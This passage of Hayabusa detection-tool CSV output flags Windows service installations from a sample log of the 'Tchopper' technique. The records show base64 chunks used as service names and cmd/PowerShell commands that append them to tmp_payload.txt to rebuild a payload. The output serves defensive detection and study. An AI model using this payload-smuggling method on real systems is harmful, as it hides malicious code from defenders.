via service - Tchopper.evtx" +2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:47.051 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 